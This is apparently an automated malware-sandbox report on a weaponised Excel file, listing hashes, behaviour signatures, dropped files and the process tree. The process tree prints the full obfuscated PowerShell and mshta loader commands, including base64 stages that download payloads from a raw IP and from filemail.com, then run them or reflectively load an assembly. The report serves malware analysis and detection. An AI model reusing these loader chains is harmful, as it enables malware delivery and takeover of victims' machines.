Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/11/2024, 08:29

General

  • Target

    cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d.xls

  • Size

    1.1MB

  • MD5

    65fbcc8da027e55f200e662f94037339

  • SHA1

    a45ff70dd8f364f4d3f0d4be15430fd288bdbbf7

  • SHA256

    cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d

  • SHA512

    bcf76e0ad9dc6a4056b5815fb1dd424dd7f0c175debc15fc878a3fc9f2a8c29df5bc00156ab378cac77ec4a9c7b8e8e2d688d97236b0966d1ffba013359b68d6

  • SSDEEP

    24576:5uq9PLiijE2Z5Z2amLKuhoF84LJQohXvFClUd7nZDiTtOZc:5uEPLiij7Z5ZKLGFjLJQohXvFTNnb6

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2960
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\SysWOW64\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe
      "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2096
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3fw8wqv-.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2140
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD2CA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD2C9.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2016
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1420
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2904

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

    Filesize

    504B

    MD5

    0b60282e9ddea43ca313d63ec56740ad

    SHA1

    e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a

    SHA256

    358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13

    SHA512

    ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    5bdcdc646dd775c9af93d4113621953d

    SHA1

    05bc2586b6afbe3088480e96b062a4e49c4c02f0

    SHA256

    11a5e3fd11028a7a82433d13b76f7185b9a59fecfef4f8bf9c0a07fff0c103d6

    SHA512

    96460af5f41ac197db8dac6e8a6797fb2eeb27f2308a7075ab6eeb840d49b1acd4c90ed15e3e73d172734b452e9d7ae50f8845ce2c3b2de260f7663dd46073ad

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

    Filesize

    550B

    MD5

    dfcef19a36708dc43add11451e62a2d8

    SHA1

    b02c12af4bc576b0b4c752686360cb16db3b4108

    SHA256

    67c2e9e4c050a47a2275377b7f5415408fd0bfb5307cfd3b0e5b4f0b5aff4e7d

    SHA512

    17effe3142dca9ef9795ffcb981410438929943dd298dc022337e758d1c2e0eaad26023bbe48b3768b2f38ae72a91c34017b4a079e6d3544b5921eaa2254066b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seethebestthignswhichgivingbestopportunities[1].hta

    Filesize

    8KB

    MD5

    84079050d0ac7a7d67860b3bc349231e

    SHA1

    b28d29044a2b13df90b18c1dd7e7f42ab33e1264

    SHA256

    4f35c65759c388932cec6112d4f68996e9e0ead957ec5145dd943c4b593b1265

    SHA512

    de5dcd5b3d6a385092a2576b691bb8cd91507dd4668e15a1ead9398585a163c5c425305ccc2b1673fb59a864094449ad9ac881ffab0ffb02fcf49ca5ec59dbea

  • C:\Users\Admin\AppData\Local\Temp\3fw8wqv-.dll

    Filesize

    3KB

    MD5

    8346c041e7d79928b6fba152753e55b2

    SHA1

    8b2adac58b5ecc40f3faa85dadac2392ede93295

    SHA256

    e82fedde2fddd4e85ea7e27f042b80b1be5489f3d849d90d6137a161b27cce58

    SHA512

    c618f16d57446abad6271caf73c68bb13bda000fb29541a1266aa219d1e23ae4bfc5d1778ef53f5ebc16a65b2d59a83c7de74331762f39ed397f1dd8c650e193

  • C:\Users\Admin\AppData\Local\Temp\3fw8wqv-.pdb

    Filesize

    7KB

    MD5

    1d4200b5cf1e9db2c9cc6102f2b10a6c

    SHA1

    31ab79cfb61876f9dae3d77e86ba206dad49e1a9

    SHA256

    499669bd5cf0643cd12cb52e6f68e25109834809dc650194cea7e1e1e155a645

    SHA512

    bca93fc3480797d3c75c0a0ade4f2ea09ad260927ebf04f4dc6c016d155c834d4ca4dc0230b3b72006b8d2d085defc75fde7cec899854bd390d2f5d326c9b34a

  • C:\Users\Admin\AppData\Local\Temp\CabCAED.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESD2CA.tmp

    Filesize

    1KB

    MD5

    a011d3bd6d2b0415a428292e5d8cba6d

    SHA1

    330c9571d04a43e95d61ad19160248ffa1782fa7

    SHA256

    786c0321d792d15359cf01f7def676328ccbac50d9f12af83022757f75acbb33

    SHA512

    ce660f1da7b0ca066da6c2ac7055f093dac47445e3be068c0625c34f70d97f82c60550d9c8eb14f7334c10718d7aa8191c392671d7471860245ab1d728a1bcfc

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    f260a9f88844a52234be3a634c53ee10

    SHA1

    44a56c9562bba4f78320710bf17fdffd8bb71000

    SHA256

    7fe5da5fd86e0063bddd707750271ae32c6996267428446e54840f60dfeb0768

    SHA512

    97e11641a963247a897c76329e2bde59f853a608fbdb468d6d515da8359f1360d4b6cdfe9cb2b74c187ec0d2cd6bd0d0bc2c92e5b7068073b90d19cd0f6d4475

  • C:\Users\Admin\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS

    Filesize

    139KB

    MD5

    da5a2b2a39d7ab8b9f9adf8af69a5f61

    SHA1

    7588e7a25bf351ac5a16eca9b68686c7970e60e5

    SHA256

    99d85e0ab098efe5ff79ed0f26f5543be8d9dc316132a80ba72001cca355e89f

    SHA512

    d042e1ba33995ba500dd91218aaab47310b31aefa91862f744719ea659eb235080de25649e50aed2ece84c1aff78c25bee6b8dbe5c680affa925516f61f95d8a

  • \??\c:\Users\Admin\AppData\Local\Temp\3fw8wqv-.0.cs

    Filesize

    487B

    MD5

    920ec087c1649b37d3e112b3d5ceb653

    SHA1

    43582d6bd4f01b5585cde7dff378fa59d38e7f7f

    SHA256

    d0c9b5992704caa64bb5429349502ae370a05e995cfe05650ee7ecc4142e5baa

    SHA512

    c79f661748e9176f0f01d405530c4704c7aab611c2d614f537ea7a7778c846a98a6156dd1f35bbe5ab5644d9c582c1de6d859925040c7a78aa44d21c19ffc673

  • \??\c:\Users\Admin\AppData\Local\Temp\3fw8wqv-.cmdline

    Filesize

    309B

    MD5

    1fc4d7f80ad6d5cf9540399c13271093

    SHA1

    0a9d5d4077652d7ae571bbf2a1d2008cb1f0af0a

    SHA256

    06b564b0db20cfdfc6b033c9b7b8a1b41e0970d0827315270d2cc6110b056911

    SHA512

    c1bfd3c9bd723202ada282c2592b8697d170bbb8aa468b7fcd702413b43d7e10f76e9658d8bd03409d033b0d3cda437e5eeb66c8da013a021da09237dc5bba1c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD2C9.tmp

    Filesize

    652B

    MD5

    757b01a1746624a314430551b8013b51

    SHA1

    b795a73fb01d1ded22750abd9896dc091c3064a2

    SHA256

    7d617e999c7a5454b9bd0bb073e3c851dfe10108be6d3455d5c965ef236c3494

    SHA512

    22792896282a2dd024aa29d937fb45a9ab6070c2cc083b43c043f792ebb5bfb91aa4be8ebf9404f9d765e72e6e9902609efa02d4de1b5fe74e3eeaebee1d8062

  • memory/2732-16-0x00000000027B0000-0x00000000027B2000-memory.dmp

    Filesize

    8KB

  • memory/2960-1-0x000000007298D000-0x0000000072998000-memory.dmp

    Filesize

    44KB

  • memory/2960-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2960-67-0x000000007298D000-0x0000000072998000-memory.dmp

    Filesize

    44KB

  • memory/2960-17-0x0000000002470000-0x0000000002472000-memory.dmp

    Filesize

    8KB